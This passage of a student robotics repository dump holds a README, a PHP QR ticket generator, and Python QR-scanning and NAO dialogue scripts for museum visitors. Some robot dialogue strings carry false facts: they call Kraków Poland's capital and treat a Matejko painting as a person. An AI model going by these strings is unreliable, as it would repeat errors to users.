robot (from Robotic Platform)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, default=\"desktop-6d4cqe5.local\",\n help=\"Robot's IP address. If on a robot or a local Naoqi - use '127.0.0.1' (this is the default value).\")\n parser.add_argument(\"--port\", type=int, default=9559,\n help=\"port number, the default value is OK in most cases\")\n args = parser.parse_args()\n session = qi.Session()\n try:\n session.connect(\"tcp://{}:{}\".format(args.ip, args.port))\n except RuntimeError:\n print (\"\\nCan't connect to Naoqi at IP {} (port {}).\\nPlease check your script's arguments.\"\n \" Run with -h option for help.\\n\".format(args.ip, args.port))\n sys.exit(1)\n main(session)\n"
},
{
"alpha_fraction": 0.7019707560539246,
"alphanum_fraction": 0.7111252546310425,
"avg_line_length": 40.592594146728516,
"blob_id": "d64dcdb92b2e867aeeea38f59ec6ee0d4d921bf7",
"content_id": "29302901216eb016e96a241f77e1acb86c91175e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7865,
"license_type": "permissive",
"max_line_length": 569,
"num_lines": 189,
"path": "/README.md",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "\n\n<!-- PROJECT LOGO -->\n\n<p align=\"center\">\n <a href=\"https://github.com/mahlaNasr/nao_robot_project\">\n <img src=\"nao_logo.png\" alt=\"Logo\" width=\"150\" height=\"150\">\n </a>\n <h3 align=\"center\">NGX NAO Robot Project</h3>\n <p align=\"center\">\n Final Year 3 BEng Individual Project\n </p>\n</p>\n\n\n<details open=\"open\">\n <summary>Table of Contents</summary>\n <ol>\n <li><a href=\"#about-the-project\">About The Project</a></li>\n <li>\n <a href=\"#a-booking-web-page-folder\">Booking Web Page folder</a>\n <ul>\n <li><a href=\"#demo-video-for-section-a\">Demo Video for Section (a)</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#b-scripts-english-folder\">Scripts (English) folder</a>\n <ul>\n <li><a href=\"#demo-video-for-section-b\">Demo Video for Section (b)</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#c-scripts-french-folder\">Scripts (French) folder</a>\n <ul>\n <li><a href=\"#demo-video-for-section-c\">Demo Video for Section (c)</a></li>\n </ul>\n </li>\n <li>\n <a href=\"#getting-started-for-virtual-nao\">Getting Started for Virtual NAO</a>\n <ul>\n <li><a href=\"#prerequisites\">Prerequisites</a></li>\n <li><a href=\"#installation\">Installation</a></li>\n </ul>\n </li>\n <li><a href=\"#d-analysing-qr-codes-folder\">Analysing Qr Codes folder</a></li>\n <li>\n <a href=\"#getting-started-for-analysing-qr-codes\">Getting Started for Analysing QR Codes</a></li> \n <ul>\n <li><a href=\"#prerequisites-1\">Prerequisites</a></li>\n <li><a href=\"#installation-1\">Installation</a></li>\n </ul>\n </li>\n <li><a href=\"#contributing\">Contributing</a></li>\n <li><a href=\"#license\">License</a></li>\n <li><a href=\"#contact\">Contact</a></li>\n </ol>\n</details>\n\n\n<!-- ABOUT THE PROJECT -->\n## About The Project\n\nThis project proposes a system where humanoid robot, NAO, uses scanned QR code ticket information to form simple conversations with the visitors at the [**the National Portrait Gallery**](https://www.nationalgallery.org.uk/whats-on/national-gallery-x) art museum.\n\nThere are three folders that are in this repository:\n* (a) booking_website\n* (b) scripts_enu\n* (c) scripts_frf\n* (d) analyse_qrcode\n\n\n\n### [(a)](https://github.com/mahlaNasr/nao_robot_project/tree/master/booking_website) Booking Web Page folder\nTo book a ticket for one of the gallery's events, I made a webpage where it generates a QR code with all the input parameters that you enter. This QR code then gets scanned by the robot to read the JSON file information inside the code. To run the scripts in this folder, [XAMPP](https://www.apachefriends.org/index.html) needs to be set up to run a local server. Write the IP address of your local server along with the directory of where the scripts are saved in the search bar of any search engine. In my case it was: `http://192.168.64.2/booking_website/index.php`.\nMake sure that this folder (a) gets saved inside `htdocs` folder in XAMPP.\n\n\n#### Demo Video for Section (a) \n[Booking a Ticket for National Gallery Museum Demo](https://youtu.be/mtQ_YTJ_wK8)\n\n\n### [(b)](https://github.com/mahlaNasr/nao_robot_project/tree/master/scripts_enu) Scripts (English) folder \nThis folder consists of all the codes that were written for the robot to scan QR codes and interact with the visitors.\nTo run the whole system, write \n `\n python nao_project.py\n `\ncommand in the terminal. A few libraries are needed to be installed in order to run the scripts which are listed below. \nMake sure that you are in the same directory as the python file (i.e. `nao_robot_project/scripts_enu`).\n\n#### Demo Video for Section (b)\n[Retrieving QR code Data to Form Personalised Speeches](https://youtu.be/nI8LN00qGhE)\n\n\n### [(c)](https://github.com/mahlaNasr/nao_robot_project/tree/master/scripts_frf) Scripts (French) folder\nThese sets of scripts were added to show future possibilities that can be done with the built system. NAO retrieves the language parameter within a pre-generated JSON file from a pre-scanned QR code that is inside the folder. It then asks the visitors to ask if NAO can speak in French or not. This program is very small and it is recorded below to show how it works. To run this program write\n `\n python nao_french_project.py\n `\ncommand in the terminal. Make sure that you are in the same directory as the python file (i.e. `nao_robot_project/scripts_frf`).\n\n#### Demo Video for Section (c)\n[Personalised Speech Based on the 'Language' Parameter of a QR Code](https://youtu.be/HNX2OmFoa7k)\n\n\n\n<!-- GETTING STARTED -->\n## Getting Started for Virtual NAO \n\nTo be able to run folders (2) and (3), follow these steps below to set up the neccessary applications. \n\n#### Prerequisites \n\nThe older version of python is needed in order to run the software.\n1. Get Python 2.7 from [python official website](https://www.python.org/about/)\n2. Get Choregraphe installed from [ALDebaran documentations](http://doc.aldebaran.com/2-4/software/choregraphe/installing.html)\n3. Get python SDK from [ALDebaran documentations](http://doc.aldebaran.com/2-4/dev/python/install_guide.html)\n\n#### Installation \n\nA few libraries are also needed.\n\n1. Install Computer Vision tools for OpenCV\n ```sh\n pip install opencv-python\n ```\n2. If your python package does not have TKinter pre-installed for the Graphical User Interface (GUI), run this command to install for python 2.7 on Linux\n ```sh\n sudo apt-get install python-tk\n ```\n3. Install pyzbar for reading barcodes using zbar library\n ```sh\n pip install pyzbar\n ```\nOther libraries such as JSON, time, os, argparse, random and qi were imported.\n\n\n\n\n### [(d)](https://github.com/mahlaNasr/nao_robot_project/tree/master/analyse_qrcode) Analysing Qr Codes folder \nThis folder was added to show how the images were analysed and decoded using a few other libraries. The results were then stored onto an Excel sheet.\n\nThere was two ways:\n1. [Real-time scanning](https://github.com/mahlaNasr/nao_robot_project/tree/master/analyse_qrcode/take_process_img) -> `take_process_img` folder\n2. [Analysing images that are already taken](https://github.com/mahlaNasr/nao_robot_project/tree/master/analyse_qrcode/opencv_image_analyse) -> `opencv_image_analyse` folder\n \n \n\n<!-- GETTING STARTED -->\n## Getting Started for Analysing QR Codes\n\n#### Prerequisites \nThese files in this folder were run and tested using python 3.8. \n1. Get Python 3.8 from [python official website](https://www.python.org/about/)\n\n\n#### Installation \nExtra libraries are needed to run this section of scripts as well as comparing the obtained results of images from Excel file.\n\n1. Install Anaconda which comes with a lot of pre-installed libraries. Instruction found in [Anadonda Documentations](https://docs.continuum.io/anaconda/install/).\n\n Alternative method can be found here [through miniconda](https://pandas.pydata.org/pandas-docs/stable/getting_started/install.html).\n2. We also need ZBar and OpenCV tools here as well.\n\n\n\n\n<!-- CONTRIBUTING -->\n## Contributing \nThis project was a contributed to help the National Gallery in order to make their ticket scan system automated through using a humanoid robot, NAO.\n\n\n\n<!-- LICENSE -->\n## License \n\nFor distribution, please reference my [code](https://github.com/mahlaNasr/nao_robot_project) and cite my [report](https://drive.google.com/file/d/1tI2FzyNm9XHmyPpshxGPi-ilAd05Y5fe/view?usp=sharing) :)\n\n\n\n\n\n<!-- CONTACT -->\n## Contact \n\nLinks to: \n* [My LinkedIn](https://www.linkedin.com/in/mahla-nasrollahi-0bb679163)\n* [My GitHub](https://github.com/mahlaNasr/) \n* [NAO Project](https://github.com/mahlaNasr/nao_robot_project)\n* [YouTube Videos for Sections (a), (b) and (c)](https://www.youtube.com/watch?v=mtQ_YTJ_wK8&list=PL7HjjvER6Zg1OaPwt4OcNtcNmq3_RAi9l&index=1&ab_channel=MahlaNasrollahi)\n* Project Presentation (coming soon!)\n\n\n"
},
{
"alpha_fraction": 0.4532019793987274,
"alphanum_fraction": 0.46305418014526367,
"avg_line_length": 34.30434799194336,
"blob_id": "005b757a3ae04cb8cf8d4f11f33f06c3f462cb9b",
"content_id": "5c0d12d89ee309caf50f9ef478f3752732ce1910",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 812,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 23,
"path": "/booking_website/input_variables.js",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "// ##########################################################################\n// Author: Mahla Nasrollahi\n// Last Updated: 11/03/2021\n// File Name: ajax_generate_qrcode.js\n//\n// This program is called when the user clicks on the \"Book Now\" button in\n// index.php file. This file captures all the input data by their ID's assigned\n// to them and sends them to generate_qr_code.php file to add them to a QR code.\n// ############################################################################\n\n$(document).ready(function() {\n $(\"#form\").submit(function(){\n $.ajax({\n url:'generate_qrcode.php',\n type:'POST',\n data: {name:$(\"#name\").val(),\n email:$(\"#email\").val(),\n ticket_type:$(\"#ticket_type\").val(),\n interests:$(\"#interests\").val()\n }\n });\n });\n});\n"
},
{
"alpha_fraction": 0.5416828393936157,
"alphanum_fraction": 0.5587437152862549,
"avg_line_length": 28.988372802734375,
"blob_id": "7934136b1eeee07965d4533faf5a8f81fec4227f",
"content_id": "91cd367031f725fe007ee7fb3e9bad0225283657",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2579,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 86,
"path": "/analyse_qrcode/real_time_scan.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.8\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 28/03/2021\n# File Name: quick_scan.py\n#\n# This script scans QR code in real-time and creats a json file with the\n# decoded data.\n############################################################################\n\n\n# Imprting related libraries\nfrom pyzbar.pyzbar import decode, pyzbar\nfrom pyzbar import pyzbar\nimport numpy as np\nimport cv2 as cv\nimport json\nimport os\n\njson_filename= 'json_qrdata'\njson_path = \"{}.json\".format(json_filename)\n\n#image = cv2.imread('1.png')\ncap = cv.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\n\nscanned = True\nprint('Please scan your QR code...')\nwhile(scanned):\n success, image = cap.read()\n # find the barcodes in the image and decode if possible\n barcodes = pyzbar.decode(image)\n\n # if no barcode is detected\n if not barcodes :\n if os.path.exists(json_path):\n os.remove(json_path)\n else:\n pass\n else:\n pass\n\n # loop over the detected barcodes\n for barcode in barcodes:\n barcodeData = barcode.data.decode(\"utf-8\")\n with open(json_path, 'w') as scanned_data:\n scanned_data.write(barcodeData)\n\n # Green colour\n myColor = (0, 255, 0)\n pts = np.array([barcode.polygon],np.int32)\n pts = pts.reshape((-1,1,2))\n cv.polylines(image,[pts],True,myColor,5)\n pts2 = barcode.rect\n cv.putText(image,\"myOutput\",(pts2[0],pts2[1]),cv.FONT_HERSHEY_SIMPLEX,0.9,myColor,2)\n\n print('scanned')\n ##To stop the real-time streming when a barcode is presented, uncomment\n ## the following command\n # scanned = False\n\n cv.imshow('Show QR Code Here',image)\n cv.waitKey(1)\n\n\n# Create a Json file of the scanned barcode\ndef json_data(parameter):\n if os.path.exists(json_path):\n with open(json_path, 'r') as jfile:\n data = json.load(jfile)\n for item in data:\n if parameter == \"Name\" or parameter == \"name\":\n name = data[\"Name\"]\n return name\n if parameter == \"Ticket_type\" or parameter == \"ticket_type\" or parameter == \"ticket_Type\":\n tick_type = data[\"Ticket_type\"]\n return tick_type\n if parameter == \"Interest\" or parameter == \"interest\":\n interest = data[\"Interest\"]\n return interest\n else:\n print(\"[INFO] Barcode is not clear\")\n return None\n"
},
{
"alpha_fraction": 0.5708107948303223,
"alphanum_fraction": 0.5767567753791809,
"avg_line_length": 30.89655113220215,
"blob_id": "44ac64e96d2e1aec64630ffedce0b737c409ffcb",
"content_id": "702afcf81d26f3a5d4990da3b06e3172dbc966c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1850,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 58,
"path": "/booking_website/generate_qrcode.php",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "<!-- ##########################################################################\nAuthor: Mahla Nasrollahi\nLast Updated: 11/03/2021\nFile Name: generate_qr_code.php\n\nThis prgram reads the user inputs from HTML form in index.php and inserts them\ninto a unique QR code. The data inside the QR code is then saved to a Json file\nfor the robot to access and read the data.\n############################################################################-->\n\n<?php\n\n if(isset($_POST) && !empty($_POST)) {\n\n // Import the external qrcode library for php\n include('library/phpqrcode/qrlib.php');\n\n // This a location where generated QR code is to be stored\n $qrcode_file_path = dirname(__FILE__).DIRECTORY_SEPARATOR.'images'.DIRECTORY_SEPARATOR;\n\n // If directory is not created then create a new directory\n if(!file_exists($qrcode_file_path)){\n mkdir($qrcode_file_path);\n }\n\n // Set a secure random file name of each generated QR code image\n $filename\t= $qrcode_file_path.md5(uniqid()).'.png';\n\n // Capture the HTML form data into variables\n\n $name = $_POST['name'];\n $email = $_POST['email'];\n $ticket_type = $_POST['ticket_type'];\n $interests = $_POST['interests'];\n\n // Store all data into an array\n $arr_data = [\n 'Name' => $name,\n 'Email' => $email,\n 'Ticket_type' => $ticket_type,\n 'Interest' => $interests\n ];\n\n // Put the array data into a json file\n $qrcode_data = json_encode($arr_data, JSON_PRETTY_PRINT);\n // QR code properties\n $qrcode_level = 'M';\n $qrcode_size = 5;\n $qrcode_margin = 3;\n\n // Generate the QR code for a user\n // png($text, $outfile=false, $level=QR_ECLEVEL_L, $size, $margin, $saveandprint=false)\n QRcode::png($qrcode_data, $filename, $qrcode_level, $qrcode_size, $qrcode_margin);\n }\n else {\n header('location:./');\n }\n?>\n"
},
{
"alpha_fraction": 0.5819027423858643,
"alphanum_fraction": 0.6140915751457214,
"avg_line_length": 33.51852035522461,
"blob_id": "3267f2be15a492516a7a83beedabfe50897a939c",
"content_id": "7b93416e193939205822cc66994ad26d111a1362",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2796,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 81,
"path": "/booking_website/distance.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "# python3 distance_detector.py -f 300 -d 0.51\nimport numpy as np\nimport time\nimport cv2\nimport tkinter\nimport argparse\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--face_height\", type=int, default=300,\n\thelp=\"height of the face in pixels\")\nap.add_argument(\"-d\", \"--distance\", type=float, default=0.51,\n\thelp=\"show warning after if less than that distance in meters\")\nargs = vars(ap.parse_args())\n\ndef create_root():\n \"\"\"Create Tkinter stream (for display a message)\"\"\"\n root = tkinter.Tk()\n root.title(\"Warning!\")\n root.resizable(width=\"false\", height=\"false\")\n root.minsize(width=350, height=50)\n root.maxsize(width=350, height=50)\n text_for_message = \"Warning! You are too close to the monitor\"\n warning_message = tkinter.Text(root)\n warning_message.pack()\n warning_message.insert(tkinter.END, text_for_message)\n return root\n\n# Create initial Tkinter stream\nroot = create_root()\n\ncap = cv2.VideoCapture(0)\n\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n\nwhile(True):\n # Capture frame-by-frame\n _, frame = cap.read()\n last_time = time.time()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n if faces == ():\n root.destroy()\n root = create_root()\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n known_height = args['face_height']\n distance = known_height/h*args['distance']\n if distance < args['distance']:\n # If we are too close - send warning\n root.update()\n else:\n # In another case destroy root and make a new one\n root.destroy()\n root = create_root()\n # Display face height at the recognized box\n text = \"Face height: {}\".format(h)\n print(h)\n cv2.putText(frame, text, (int(x), int(y)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n # Display distance from face to monitor\n cv2.putText(frame, \"%.2fm\" % (distance),\n (frame.shape[1] - 200, frame.shape[0] - 20), cv2.FONT_HERSHEY_SIMPLEX,\n 2.0, (0, 255, 0), 3)\n # Display how comfort recording are (more frames are better):\n cv2.putText(frame, \"FPS: %f\" % (1.0 / (time.time() - last_time)),\n (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\nroot.destroy()\ncap.release()\ncv2.destroyAllWindows()\n"
},
{
"alpha_fraction": 0.45234376192092896,
"alphanum_fraction": 0.4566406309604645,
"avg_line_length": 39,
"blob_id": "6f07168df1e84be08dfc56c2bd2befda7d4a5be6",
"content_id": "041d907337b4015409f4b33847dfdc4b34ca1008",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5120,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 128,
"path": "/scripts_frf/nao_scan_lang.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 25/03/2021\n# File Name: nao_scan.py\n#\n# This class scans a QR code and checks if it is decodable or not. If it\n# is decodable, the program stores the QR code information into a json file.\n############################################################################\n\n#--------------------------------------------------------------------------\n# Importing necessary packages\n#--------------------------------------------------------------------------\nfrom pyzbar import pyzbar\nimport cv2 as cv\nimport json\nimport os\n\n\nclass NaoScanBarcode:\n def __init__(self):\n # Json file path and direction\n self.json_filename= 'json_qrdata'\n self.json_path = \"{}.json\".format(self.json_filename)\n\n #---------------------------------------------------------------------------\n # Open a window frame for the camera to scan QR code. Also, check if the\n # barcode is decodable or not.\n # Argument: None\n #---------------------------------------------------------------------------\n def scan_qrcode(self):\n # Record whether a QR code is decodable or not in lists\n self.decode_result = []\n\n try:\n # Initialise camera video\n vidStream = cv.VideoCapture(0, cv.CAP_DSHOW)\n vidStream.set(3,640)\n vidStream.set(4,480)\n except:\n print (\"problem opening input stream\")\n sys.exit(1)\n\n print \"[INFO] Scanning QR code...\"\n scanned = True\n while(scanned):\n success, image = vidStream.read()\n # Decode if possible\n barcodes = pyzbar.decode(image)\n\n # if no barcode information is detected\n if not barcodes :\n # Remove old json files\n if os.path.exists(self.json_path):\n os.remove(self.json_path)\n else:\n pass\n self.decode_result.append(\"Decoding Failed\")\n else:\n pass\n\n # loop over the detected barcodes\n for barcode in barcodes:\n barcodeData = barcode.data.decode(\"utf-8\")\n # Save barcode information insidea new json file\n with open(self.json_path, 'w') as scanned_data:\n scanned_data.write(barcodeData)\n self.decode_result.append(\"Decoding Passed\")\n scanned = False\n\n # Show scanning window\n cv.imshow('Show QR Code Here',image)\n cv.waitKey(1)\n\n #---------------------------------------------------------------------------\n # Check if the detected barcode is clear and readable by the camera. If\n # it is clear enough, its values is saved as passed. Otherwise, it is failed.\n # Argument: None\n #---------------------------------------------------------------------------\n def check_readable(self):\n for i in range(len(self.decode_result)):\n if self.decode_result[i] == \"Decoding Passed\":\n return True\n else:\n return False\n\n #---------------------------------------------------------------------------\n # Check if a json file exists first. If file exists, find all parameters\n # and data and save save them.\n # Argument: Parameter, type=string, it is the value of the key elements\n # in the json file\n #---------------------------------------------------------------------------\n def json_data(self, parameter):\n if os.path.exists(self.json_path):\n # Read existing json file\n with open(self.json_path, 'r' ) as jfile:\n data = json.load(jfile)\n\n # Loop through all the data inside json file and return them\n for item in data:\n if parameter == \"Name\" or parameter == \"name\":\n name = data[\"Name\"]\n return name\n if parameter == \"Ticket_type\" or parameter == \"ticket_type\" or parameter == \"ticket_Type\":\n tick_type = data[\"Ticket_type\"]\n return tick_type\n if parameter == \"Interest\" or parameter == \"interest\":\n interest = data[\"Interest\"]\n return interest\n if parameter == \"Language\" or parameter == \"language\":\n language = data[\"Language\"]\n return language\n else:\n print(\"[INFO] Barcode is not clear and no json file found\")\n return None\n\n #---------------------------------------------------------------------------\n # Check if a json file exists first. If file exists, delete it along with\n # information inside it when a visitor finishes his/her talk session.\n # Argument: None\n #---------------------------------------------------------------------------\n def remove_json(self):\n if os.path.exists(self.json_path):\n os.remove(self.json_path)\n else:\n pass\n"
},
{
"alpha_fraction": 0.5249730348587036,
"alphanum_fraction": 0.5298239588737488,
"avg_line_length": 53.03883361816406,
"blob_id": "1f7d6dce6cab8d345d234b0127655e5e6f743be9",
"content_id": "a75eee7a9981ab4794ced02945cb9b9026a10e54",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5577,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 103,
"path": "/scripts_enu/nao_talk.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 25/03/2021\n# File Name: nao_talk.py\n#\n# This class stores some string dialogs with regards to the different\n# interests inputs that the visitors choose when they book their tickets.\n# The strings are returned randomly for the robot to talk back at the\n# visitors.\n############################################################################\n\n#--------------------------------------------------------------------------\n# Importing necessary packages\n#--------------------------------------------------------------------------\nimport random\nimport json\n\n\n\nclass NaoDialogs:\n def __init__(self):\n pass\n\n #---------------------------------------------------------------------------\n # Introduction on what the NAO is going to talk about next for different\n # interest input values.\n # Argument: None\n #---------------------------------------------------------------------------\n def intro_interest(self):\n speech_interests = [\"I see that you are interested in the \",\n \"Oh you have a fascinating interest in the \",\n \"So your interest lies within the \"]\n return random.choice(speech_interests)\n\n #---------------------------------------------------------------------------\n # This function returns a random string based on what interest parameter\n # visitors have chosen. There are 3 different interest choices:\n # Artist, History and Culture\n # Argument: json_value, type=string, it is the interest choice of the\n # visitor based on their QR code\n #---------------------------------------------------------------------------\n def interest_talk(self, json_value):\n # Based on json file data value from user inputs, choose one statement\n if json_value == \"Artist\":\n about_artist = [\n \"Let me tell you something about Jan Matejko’s Copernicus.\"\\\n \" He was a Polish painter who lived and worked in Kraków. He\"\\\n \" was considered the finest representative of historicism in\"\\\n \" Polish painting and founder of the national school of\"\\\n \" historical painting.\",\n \"Did you know that Jan Matejko’s Copernicus won international\"\\\n \" fame and recognition before he turned thirty? He was mostly\"\\\n \" known for being a Polish history painter. If you ever visit\"\\\n \" the capital of Poland, Krakow, don't forget to visit the\"\\\n \" beautiful monument of Jan Matejko\",\n \"Jan Matejko’s Copernicus had ten siblings and he was the ninth\"\\\n \" from the eleven that his parents had. This Polish painter\"\\\n \" was mostly known for his drawings of notable historical\"\\\n \" Polish political and military events.\"\n ]\n # Pick a random dialog from above list and send it to the robot\n return random.choice(about_artist)\n\n elif json_value == \"History\":\n about_history =[\n \"I will tell you a little history about Matejko. He has won two\"\\\n \" gold medals of 1st classes at the Universal Exhibition in\"\\\n \" Paris one of which was for Rejtan painting in 1867. That\"\\\n \" painting was later bought by the Emperor of Austria\",\n \"Jan Matejk was at a very young age when Kraków was during its\"\\\n \" revolution of 1846 and also witnessed the siege of Kraków in\"\\\n \" 1848 by the Austrians which did not end up being so great for\"\\\n \" the Free City of Kraków.\",\n \"Did you know that Matejk attended St. Ann's High School in\"\\\n \" Kraków, Poland, but since he was not performing well, he\"\\\n \" dropped out of school in 1851. However, getting low grades\"\\\n \" in other subjects did not stop him from developing artistic talent.\"\n ]\n return random.choice(about_history)\n\n elif json_value == \"Culture\":\n about_culture = [\n \"According to my research, Polish food, specially the one that\"\\\n \" is called pierogi is very delicious and must be tried at least\"\\\n \" once. Pierogies is kind of a dough filled with different fillings.\"\\\n \" It is usually cooked or baked and is served with the greaves,\"\\\n \" onion or sour cream. I will most likely cook that today when\"\\\n \" I go home.\",\n \"As far as I know, Poland has long winter seasons. So, to\"\\\n \" celebrate the first day of spring, children usually go to\"\\\n \" truancy or make a straw doll with colourful ribbons called\"\\\n \" Marzanna. Adults on the other hand help in setting Marzanna\"\\\n \" on fire and then dropping the doll into the local river.\"\\\n \" This Polish tradition is a peculiar way of saying goodbye to winter.\",\n \"Did you know that Polish people have a popular saying, which\"\\\n \" rougly translates to having a guest in the house is like\"\\\n \" having a God in the house. So you enter a Polish home, expect\"\\\n \" to be treated like a member of the royalty!\"\n ]\n return random.choice(about_culture)\n"
},
{
"alpha_fraction": 0.5125501155853271,
"alphanum_fraction": 0.5276790857315063,
"avg_line_length": 37.10043716430664,
"blob_id": "9baf987b02daee989cd6ce3816b194683bd3edd8",
"content_id": "29a0a244d04edc90fc6da6fa84503e9df01abe6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8725,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 229,
"path": "/analyse_qrcode/take_process_img/take_process_img.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.8\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 28/03/2021\n# File Name: take_process_img.py\n#\n# This script taken a given number of images and process them to see if they\n# are clear to be recognised in the image and if they are able to be decoded\n############################################################################\n\n\n# import the necessary packages\nfrom pyzbar import pyzbar\nimport time, datetime\nimport pandas as pd\nimport argparse, os\nimport numpy as np\nimport cv2 as cv\n\n# Determine the number of images you want to take in order to be analysed\nmaxFrames = 1\ncpt = 0\n\n\ndecode_result = []\nconfidence_score = []\nimage_direc = 'taken_images/'\ndecoded_img_path = 'decoded_img/'\nfinal_path = 'results/'\ncrop_dir = 'crop_img/'\n\ntry:\n vidStream = cv.VideoCapture(0) # index of your camera\nexcept:\n print (\"problem opening input stream\")\n sys.exit(1)\n\nwhile cpt < maxFrames:\n ret, frame = vidStream.read() # read frame and return code.\n if not ret: # if return code is bad, abort.\n sys.exit(0)\n cv.imshow(\"test window\", frame) # show image in window\n cv.imwrite(\"taken_images/image%i.jpg\" %cpt, frame)\n cpt += 1\n\ndef analye_img():\n for filename in os.listdir(image_direc):\n # Read the image files in directory specified\n if filename.endswith(\".jpg\"):\n image_path = str(os.path.join(image_direc, filename))\n # load the input image\n image = cv.imread(image_path)\n\n\n # find the barcodes in the image and decode each of the barcodes\n barcodes = pyzbar.decode(image)\n font = cv.FONT_HERSHEY_SIMPLEX\n\n # if no barcode is detected\n if not barcodes :\n result_txt = \"Decoding Failed\"\n # get boundary of this text\n textsize = cv.getTextSize(result_txt, font, 1, 2)[0]\n # get coords based on boundary\n textX = (image.shape[1] - textsize[0]) / 2\n textY = (image.shape[0] + textsize[1]) / 2\n cv.putText(image, result_txt, (int(textX), int(textY)), font, 2, (0, 0, 255), 2)\n\n save_decode = str(os.path.join(decoded_img_path, filename))\n cv.imwrite(save_decode, image)\n\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n decode_result.append(result_txt)\n\n\n # loop over the detected barcodes\n for barcode in barcodes:\n # extract the bounding box location of the barcode and draw the\n # bounding box surrounding the barcode on the image\n (x, y, w, h) = barcode.rect\n cv.rectangle(image, (x, y), (x + w, y + h), (0, 255, 255), 3)\n\n # the barcode data is a bytes object so if we want to draw it on\n # our output image we need to convert it to a string first\n barcodeData = barcode.data.decode(\"utf-8\")\n barcodeType = barcode.type\n # draw the barcode data and barcode type on the image\n text = \"{} ({})\".format(barcodeData, barcodeType)\n result_txt = \"Decoding Passed\"\n cv.putText(image, result_txt, (x, y - 10), font, 1, (0, 255, 0), 1)\n\n save_decode = str(os.path.join(decoded_img_path, filename))\n cv.imwrite(save_decode, image)\n\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n decode_result.append(result_txt)\n\n\ndef conf_score():\n for filename in os.listdir(decoded_img_path):\n if filename.endswith(\".jpg\"):\n image = str(os.path.join(decoded_img_path, filename))\n # Load an image\n frame = cv.imread(image)\n\n threshold = 0.6\n maxWidth = 1280; maxHeight = 720\n imgHeight, imgWidth = frame.shape[:2]\n hScale = 1; wScale = 1\n thickness = 1\n\n if imgHeight > maxHeight:\n hScale = imgHeight / maxHeight\n thickness = 6\n\n if imgWidth > maxWidth:\n wScale = imgWidth / maxWidth\n thickness = 6\n\n # Load class names and YOLOv3-tiny model\n classes = open('../qrcode.names').read().strip().split('\\n')\n net = cv.dnn.readNetFromDarknet('../qrcode-yolov3-tiny.cfg', '../qrcode-yolov3-tiny.weights')\n net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)\n # net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU) # DNN_TARGET_OPENCL DNN_TARGET_CPU DNN_TARGET_CUDA\n\n start_time = time.monotonic()\n # Convert frame to blob\n blob = cv.dnn.blobFromImage(frame, 1/255, (416, 416), swapRB=True, crop=False)\n elapsed_ms = (time.monotonic() - start_time) * 1000\n # print('blobFromImage in %.1fms' % (elapsed_ms))\n\n def postprocess(frame, outs):\n frameHeight, frameWidth = frame.shape[:2]\n\n classIds = []\n confidences = []\n boxes = []\n\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > threshold:\n x, y, width, height = detection[:4] * np.array([frameWidth, frameHeight, frameWidth, frameHeight])\n left = int(x - width / 2)\n top = int(y - 